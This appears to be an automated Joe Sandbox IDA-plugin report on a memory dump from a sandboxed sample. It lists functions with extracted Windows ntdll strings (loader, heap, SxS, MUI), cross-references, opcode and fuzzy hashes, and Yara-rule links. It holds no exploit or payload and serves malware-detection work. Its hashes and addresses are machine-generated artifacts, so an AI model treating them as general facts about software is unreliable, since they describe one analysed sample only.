Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 852ffe04c6174477fddf20ee8a5968792ee9f4a2707d9d67db294ef4afe0b54d
Instruction ID: 4cda12bc1fae74ab31b6e48ae98e0a485ad016ec687fba26ca52020abc9eacdd
Opcode Fuzzy Hash: 852ffe04c6174477fddf20ee8a5968792ee9f4a2707d9d67db294ef4afe0b54d
Instruction Fuzzy Hash: 8C0252B2D00228DBDB65DB14CC94BEEB7B8AF44704F5041EAEE09A7241DB709E85CF59

Function 026C0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

0, xrefs: 026C0F92
%%%u!%s!, xrefs: 027014A1
w, xrefs: 026C0FBA
%%%u, xrefs: 027014CC
%, xrefs: 026C0F7E
l, xrefs: 026C0FC4
h, xrefs: 026C0FB0
, xrefs: 026C0FEC
9, xrefs: 026C0F9C
!, xrefs: 026C0FA6

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: 3ff13bfe90669acbe5ca4cb05dcbee528b1e0487cce7863df9ebbad9c5696175
Instruction ID: 394e172439e27403d8421df2aa46d0b0c175cb374055e96b469954840bee64d3
Opcode Fuzzy Hash: 3ff13bfe90669acbe5ca4cb05dcbee528b1e0487cce7863df9ebbad9c5696175
Instruction Fuzzy Hash: 51629FB5A00269CFDB24DF18C8817A9B7F2EF95324F9482DAD44DAB280D7725AD5CF40

Function 02738B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

heapType, xrefs: 02738BCB
svchost.exe, xrefs: 02738B68
lsass.exe, xrefs: 02738BA1
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 02738BD0
services.exe, xrefs: 02738B96
csrss.exe, xrefs: 02738B80
DefaultBrowser_NOPUBLISHERID, xrefs: 02738D00
smss.exe, xrefs: 02738B8B
SegmentHeap, xrefs: 02738BE9
runtimebroker.exe, xrefs: 02738B73

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: d2cd65725267aff9fd1e645fdfa1811c745dcdca6f5646ddeab0c1c8b81a9d36
Instruction ID: 2a18a53030438dff12b84fe79fa00cf0ebb750ff28f6b7adc77758f0f0727dc8
Opcode Fuzzy Hash: d2cd65725267aff9fd1e645fdfa1811c745dcdca6f5646ddeab0c1c8b81a9d36
Instruction Fuzzy Hash: AF51CF716163059BD326DF298944BABB7E8EF88358F144A6DF899C3242E770D604CB93

Function 027412ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 027418A5
Free Heap block %p modified at %p after it was freed, xrefs: 0274171B
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 0274186B
HEAP: , xrefs: 02741706, 02741756, 027417A8, 02741809, 0274184D, 02741895, 027418E6
Heap block at %p is not last block in segment (%p), xrefs: 027417B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 027418F8
Heap block at %p has incorrect segment offset (%x), xrefs: 0274181A
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 0274176D
HEAP[%wZ]: , xrefs: 027416CD, 027416F9, 02741749, 0274179B, 027417FC, 02741840, 027418D9

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: cbd67c7c1c2668fc603da295c77a8377b52e01983b7667510bc8785c26d5d21b
Instruction ID: 9f219f6a97f0904b92e35040c39205bc47562a541c77430ea6ed1ad076ed1967
Opcode Fuzzy Hash: cbd67c7c1c2668fc603da295c77a8377b52e01983b7667510bc8785c26d5d21b
Instruction Fuzzy Hash: A312B130600642DFDB25EF28C445BB6BBF6FF09718F948499E49A9B651DB74E880CB50

Function 026AAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpFindLoadedDllInternal, xrefs: 026F82D7
minkernel\ntdll\ldrutil.c, xrefs: 026F80B7
minkernel\ntdll\ldrfind.c, xrefs: 026F82E1
DLL search path passed in externally: %ws, xrefs: 026F80A6
LdrGetDllHandleEx, xrefs: 026F807C, 026F83B2
Status: 0x%08lx, xrefs: 026F82D0, 026F83AB
minkernel\ntdll\ldrapi.c, xrefs: 026F8086, 026F83BC
LdrpInitializeDllPath, xrefs: 026F80AD
DLL name: %wZ, xrefs: 026F8075

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 2980f5c11a4c27e70faf48ccc136cfeffdda42dae81deb0d16057bb4daf014c4
Instruction ID: 84a845e0dacaf48ded07d30cbf05138e97edcf4af6eb4babdc1a7804818b1af5
Opcode Fuzzy Hash: 2980f5c11a4c27e70faf48ccc136cfeffdda42dae81deb0d16057bb4daf014c4
Instruction Fuzzy Hash: 1312C172A083819BD728DB54C8A0BAAB7E5FF84708F04495EF9858B390E734DD45CF92

Function 0268D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 0268D663
PreferredUILanguages, xrefs: 0268D4B8, 0268D4C5
Control Panel\Desktop\MuiCached, xrefs: 0268D62B
@, xrefs: 0268D49D
PreferredUILanguagesPending, xrefs: 026EA8DE
MachinePreferredUILanguages, xrefs: 0268D685
@, xrefs: 0268D3E9
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0268D3B6
Control Panel\Desktop, xrefs: 0268D45D

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: eb0015d1f7d02ff414412c6d7025f67747b8b8b956090368aa93b5ca78baefdc
Instruction ID: 8c1ca4525010682f96e5e2b05ee5cee7a1d20eb41bc4ad952316b783a2fdeecc
Opcode Fuzzy Hash: eb0015d1f7d02ff414412c6d7025f67747b8b8b956090368aa93b5ca78baefdc
Instruction Fuzzy Hash: 5AB19C719083559BCB25EF64C480B6BB7E9AB88758F014A2EF889D7380D770DD45CBA2

Function 02740CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

dedicated (%04Ix) free list element %p is marked busy, xrefs: 02740ED1
HEAP: , xrefs: 02740E61, 02740EC2, 02740FD5, 0274105E, 02741124, 02741178
Non-Dedicated free list element %p is out of order, xrefs: 02740E6D
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 0274106F
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 0274113D
HEAP[%wZ]: , xrefs: 02740E54, 02740EB5, 02740FC8, 02741051, 02741117, 0274116B
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 02741192
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 02740FE4

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: af5dca353c87cccaee238765e71bd81ebfd02e0d5d4b35a8e2bef6de06bebcb2
Instruction ID: a896c9cdfbcd4acb5286fc912be3a371f3bc815fdc87bb85b8875cd5b86ecde0
Opcode Fuzzy Hash: af5dca353c87cccaee238765e71bd81ebfd02e0d5d4b35a8e2bef6de06bebcb2
Instruction Fuzzy Hash: 36F13731A00255EFDB29EF68C480BBAB7F5FF0A708F448199E586A7251CB74B985CF50

Function 02740274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 027405F1
About to reallocate block at %p to %Ix bytes, xrefs: 027403BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 027406EA
HEAP: , xrefs: 027403A6, 027404B5, 027405DD, 02740682, 027406D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 027404D3
RtlReAllocateHeap, xrefs: 027402BF, 02740362
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0274069F
HEAP[%wZ]: , xrefs: 02740399, 027404A8, 027405D0, 02740675, 027406CC

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 5caa0c2650c93d8c4f261f71bd39da2fe98a96a2673b7d5cfb31785f90f3907d
Instruction ID: ad5c48695778f39a61658615513132654e726cdd16f816bb980e281671162d97
Opcode Fuzzy Hash: 5caa0c2650c93d8c4f261f71bd39da2fe98a96a2673b7d5cfb31785f90f3907d
Instruction Fuzzy Hash: 9BD1F031A40282DFDB2AEF68C454AADFBF2FF4A718F188049E5469B252CB74D940CF55

Function 027189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 02718A67
AVRF: -*- final list of providers -*- , xrefs: 02718B8F
HandleTraces, xrefs: 02718C8F
VerifierFlags, xrefs: 02718C50
VerifierDlls, xrefs: 02718CBD
VerifierDebug, xrefs: 02718CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 02718A3D

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 8f0c3ccc6f346e9e97c5b37903e84e3fbb91d664d884bee746fa8963a0d66471
Instruction ID: c061a534af7a33c3ed5be317b59723cc80f1f5912b00120caeccc5be6ef58475
Opcode Fuzzy Hash: 8f0c3ccc6f346e9e97c5b37903e84e3fbb91d664d884bee746fa8963a0d66471
Instruction Fuzzy Hash: AF9103B1A82311EFF721EF6C8880B2B77A9AF44B14F554998FA456B250D7709C01CB9B

Function 0269EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 026F4643
T, xrefs: 0269EB4E
, xrefs: 0269F299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0269EB58
R, xrefs: 0269EB62
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0269EB6C

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: f5dcbfe9c05933b2c457197014caf692d98db2b6a5b1183efe3be9ee03f2c19e
Instruction ID: 50c8eb9dc611b4649b2bf2fc551688dd3ac1231881da6378b31f8a77028331e2
Opcode Fuzzy Hash: f5dcbfe9c05933b2c457197014caf692d98db2b6a5b1183efe3be9ee03f2c19e
Instruction Fuzzy Hash: FFA24970A056698FDF68DF19CC887AAB7B9AF45304F1442EAD909A7790DF319E81CF40

Function 0268F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 026EE291
((LONG)FreeEntry->Size > 1), xrefs: 026EE0B3
(!TrailingUCR), xrefs: 026EE3A9
HEAP: , xrefs: 026EDF64, 026EE0A8, 026EE286, 026EE39E
(UCRBlock != NULL), xrefs: 026EDF6F
HEAP[%wZ]: , xrefs: 026EDF57, 026EE09B, 026EE279, 026EE391

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: cc29535acd4918a44756643a0fbf1c94080fe0014ebd3f22e188530ad178c5f4
Instruction ID: e7f707f6551e2c7fd5efa63c80e4d3762bce39f181de6745695fce791d29d1c4
Opcode Fuzzy Hash: cc29535acd4918a44756643a0fbf1c94080fe0014ebd3f22e188530ad178c5f4
Instruction Fuzzy Hash: 2742FF312053819FCB19EF28C494B2ABBE6FF88718F544A6DE8868B751D734D846CF52

Function 0269ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON

Download Yara Rule

Strings

LdrpResSearchResourceMappedFile Exit, xrefs: 0269AECC
J, xrefs: 0269AEAE
LdrpResSearchResourceMappedFile Enter, xrefs: 0269AEB8
MUI, xrefs: 0269B410
H, xrefs: 0269AEC2
#, xrefs: 026F363D

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
API String ID: 0-4098886588
Opcode ID: 103a2fbc8106738e9a56ccb35646ef806bf9b69089e9a60383343215cd8db62c
Instruction ID: ffb05664592b2fb8b5328ae0464bc58c3cb3f4898c7c1a2924ff60c882c79c26
Opcode Fuzzy Hash: 103a2fbc8106738e9a56ccb35646ef806bf9b69089e9a60383343215cd8db62c
Instruction Fuzzy Hash: 1432D0719042A9CBDF25CF14D898BEEB7B9AF45348F1441EAE849A7350DB319E81CF44

Function 026AB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

SxS, xrefs: 026F83ED
LdrpPreprocessDllName, xrefs: 026F8403, 026F84D7
API set, xrefs: 026F83F4, 026F83F9
DLL %wZ was redirected to %wZ by %s, xrefs: 026F83FC
minkernel\ntdll\ldrutil.c, xrefs: 026F840D, 026F84E1
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 026F84D0

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: dace396beb690bfae96c6313f863fb0edc98a8607b808c9f5f6b5d643924fa7d
Instruction ID: 4f61b9dc34da049877eb5a4504119df6327fd6ea565c441617f1f8d160d48935
Opcode Fuzzy Hash: dace396beb690bfae96c6313f863fb0edc98a8607b808c9f5f6b5d643924fa7d
Instruction Fuzzy Hash: 25C15931A00255ABDF288F68C8A4BBEB7A5FF5530CF1441AAE9069B391DB74CC45CF90

Function 026C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 027041FE
Process initialization failed with status 0x%08lx, xrefs: 0270413A
Delaying execution failed with status 0x%08lx, xrefs: 02704258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 027040D8
minkernel\ntdll\ldrinit.c, xrefs: 027040E9, 0270414B, 0270420F, 02704269
_LdrpInitialize, xrefs: 027040DF, 02704141, 02704205, 0270425F

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: f1231b8f40c78c52338c692e517ce01df61e9124b6046f7e633156f5d27b7757
Instruction ID: be7d9940025e27f74d8e970d8083c6e37c40111badaa89de12cb55d503ee8da7
Opcode Fuzzy Hash: f1231b8f40c78c52338c692e517ce01df61e9124b6046f7e633156f5d27b7757
Instruction Fuzzy Hash: 11911570F80355DBEB25EF14DC95B7A77E9EB84B28F24816CDA056B2C0D7709805CB98

Function 0268645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 02686496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 026E9A01
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 026E9A2A
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 026E99ED
minkernel\ntdll\ldrinit.c, xrefs: 026E9A11, 026E9A3A
LdrpInitShimEngine, xrefs: 026E99F4, 026E9A07, 026E9A30

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: cc1563302f1def2d0a01c233369d0bd53fa3bf1068b93d6139531020c5ea8a9d
Instruction ID: 3ece4725d8afb8d12c4d9856c942feb468c2edd6f973a4e7d7cf4ff73dbec4d6
Opcode Fuzzy Hash: cc1563302f1def2d0a01c233369d0bd53fa3bf1068b93d6139531020c5ea8a9d
Instruction Fuzzy Hash: EB5114716493009FE724EF28DC91BAB77E9EF84B58F104A1DF98697250D730E905CB92

Function 026C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02702180
RtlGetAssemblyStorageRoot, xrefs: 02702160, 0270219A, 027021BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02702178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0270219F
SXS: %s() passed the empty activation context, xrefs: 02702165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 027021BF

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 0d1e4a37fc3112b2e9686ce2c98814f97005c08ec41d7db36d37dd01c9bd0f64
Instruction ID: 967eaa8140c0acbe9a55fc44f765adb61cb6bcb95200ff36f2a61f21b6ea980b
Opcode Fuzzy Hash: 0d1e4a37fc3112b2e9686ce2c98814f97005c08ec41d7db36d37dd01c9bd0f64
Instruction Fuzzy Hash: 9F312672B40224ABF722AA958CD9F7BB7B9EF54A44F150069FE05B7281D2709E01C6A1

Function 026CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 02708181, 027081F5
LdrpInitializeImportRedirection, xrefs: 02708177, 027081EB
minkernel\ntdll\ldrinit.c, xrefs: 026CC6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 027081E5
Loading import redirection DLL: '%wZ', xrefs: 02708170
LdrpInitializeProcess, xrefs: 026CC6C4

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 8de65dcb171027da72d036dfdb19f0ab69e9abaaea469392b867f9ecc3cf0a4e
Instruction ID: f984bcedf54dcc34add439a0a94d4302d34c6c15073036cee7e94e0debe5d509
Opcode Fuzzy Hash: 8de65dcb171027da72d036dfdb19f0ab69e9abaaea469392b867f9ecc3cf0a4e
Instruction Fuzzy Hash: 603125717843459BD211FF28DD85E6AB7D5EF84B24F14099CF845AB391E620EC04CBA7

Function 026A9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

Internal error check failed, xrefs: 026F76B2
, xrefs: 026A99F1
minkernel\ntdll\sxsisol.cpp, xrefs: 026F76AD
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 026F76A3
, xrefs: 026A99F9

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: cbc8817cad50a946083c9ddb5def80d6ae012c118e2c07deaf201533cc91451f
Instruction ID: b55f1a7dde568d94becbf242ff2652bdac08c88ae8ff0508bc3bc46496f6ea9d
Opcode Fuzzy Hash: cbc8817cad50a946083c9ddb5def80d6ae012c118e2c07deaf201533cc91451f
Instruction Fuzzy Hash: E502237150A341CBD725CF24C1A4BABB7E5BF89708F64891EE9898B350E770D845CF92

Function 026D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 026D2DF0: LdrInitializeThunk.NTDLL ref: 026D2DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026D0BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026D0BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026D0D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 026D0D74

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 3e531b003c0cba4daea0008bab3b99f6070a23531ebca8d8b49601c8ae543901
Instruction ID: df165f5b7ec1f2fcaccce545bedfe1366ad4ef663fbcdfa3d018b40410b27923
Opcode Fuzzy Hash: 3e531b003c0cba4daea0008bab3b99f6070a23531ebca8d8b49601c8ae543901
Instruction Fuzzy Hash: DC425D71900719DFDB24CF24C880BAAB7F5FF44314F1445AAE999DB282E770A985CF60

Function 02714F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

\microsoft.system.package.metadata\Application, xrefs: 02715158
/, xrefs: 02714F6D
.Local, xrefs: 02715170
\, xrefs: 02714F66
.DLL, xrefs: 027150C7, 0271519C

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: e9eedc64c666ccd5f89d563000bf417fda25f455d1ebe6349d4c0134b0434940
Instruction ID: bdc3328d62651399ffed63af75932a32de082abf203cbf12bc51bad20530fd86
Opcode Fuzzy Hash: e9eedc64c666ccd5f89d563000bf417fda25f455d1ebe6349d4c0134b0434940
Instruction Fuzzy Hash: 7D91C172D00619CBCB25CFACC880AAEB7B5FF89714F994169E815EB350E775DA01CB90

Function 026CC720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON

Download Yara Rule

Strings

8>{, xrefs: 0270836A
Failed to reallocate the system dirs string !, xrefs: 027082D7
minkernel\ntdll\ldrinit.c, xrefs: 027082E8
LdrpInitializePerUserWindowsDirectory, xrefs: 027082DE
8>{, xrefs: 02708285, 02708365

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: 8>{$8>{$Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-3467208574
Opcode ID: c63ead6db868c39181c152d82f1874a242be82a0445bee7be2b17505ba60c38b
